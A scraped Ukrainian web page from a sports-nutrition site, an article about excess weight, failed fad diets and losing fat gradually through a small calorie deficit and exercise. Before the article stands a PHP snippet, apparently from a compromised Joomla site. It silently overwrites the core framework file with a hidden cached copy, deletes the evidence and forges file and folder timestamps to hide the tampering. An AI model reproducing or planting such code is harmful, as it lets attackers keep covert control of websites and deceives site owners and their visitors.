$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Зайва вага... Зайва вага...Зайва вага | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Зайва вага... Зайва вага...Зайва вага

Зайва вага - ваша проблема з дитинства? Або сидяча робота в поєднанні з неправильним харчуванням і посиденьки  у барі з друзями раптом вилилися неприємним животиком? А може, ви нещодавно стали мамою, але щастя материнства затьмарюють зайві кілограми, які чомусь ніяк не хочуть зникати? Звичний одяг прикро не застібається, випирає живіт псує настрій ... Пора сідати на дієту чергову ...

Перепробували всі способи схуднути?
Кремлівська дієта, японська дієта, дієта Протасова ... Деякі навіть допомагають, але результати короткочасні. Ненависний жир повертається знову і знову? Це не дивно, більшість диво-дієт спалює аж ніяк не жир: очищення кишечника, зневоднення, втрата м'язової маси (м'язи вимагають енерговитрат, а отже, прибираються в першу чергу з метою економії). Ваги кожен день радують, показуючи зниження ваги, а дзеркало ... дзеркало показує правду: целюліт нікуди не подівся, шкіра в'яла, волосся тьмяне, колір шкіри - нездоровий ... Організм недоотримує необхідні речовини - і безслідно це не проходить. Режим жорсткого обмеження має і зворотний бік: після важких часів необхідно зробити запаси на майбутнє. І. .. після дієти вага набирається ще швидше, ніж знижувався. Знову не вдається влізти в улюблені джинси, пора на нову дієту ... Замкнуте коло?

Результат - ось чого вам не вистачає!

Не прагніть швидко схуднути, не піддавайтеся рекламі, не глушіть свій організм модними пігулками, від яких у кращому випадку - ніякої користі, а в гіршому - проблеми зі здоров'ям.


Позбутися зайвої ваги дможливо, але доведеться докласти зусиль. Чудес не буває, від лежання на дивані перед телевізором з пляшкою пива жир не розсмокчеться сам собою. Не можете втриматися, щоб не поїсти після шести? Не переживайте! Іноді це просто необхідно. Вольові відмови від їжі і сильний голод - це сигнал організму: все погано, а далі може бути і ще гірше, при першій можливості треба запасати ... правильно, жир! Не треба морити себе голодом, потрібно харчуватися правильно! Ви вечеряєте легким салатом із зелені? Правда? А рослинна олію ви туди льєте? Три столові ложки - і виходить висококалорійне блюдо, та ще й на ніч. Ще пара таких прорахунків - і жодні способи схуднути вам не допоможуть.

Зайвий жир - це наслідок

Хочете з ним впоратися? Знайдіть причину і усуньте її! З системою спалювання жиру доведеться змінити спосіб життя: збалансувати харчування, стати більш активною. І ніякої хімії. Не чекайте сенсацію - 20 кілограм на місяць без шкоди для здоров'я скинути не вдасться. Жир піде поступово, в шкіри буде час адаптуватися до змін, фізичні навантаження будуть сприяти гарному тонусу.

Принцип схуднення простий: треба їсти менше, ніж витрачається. Наскільки менше? Без стресу для організму - на 15-20% нижче вашої норми. Для того, щоб замість жиру не спалювалися м'язи, необхідне фізичне навантаження.

 

Отже підбирати дієту треба дуже обережно, але різноманітність і величезний вибір дозволяють вибрати саме вашу дієту.

 
Харчування-здоровий спосіб життя Зайва вага... Зайва вага...Зайва вага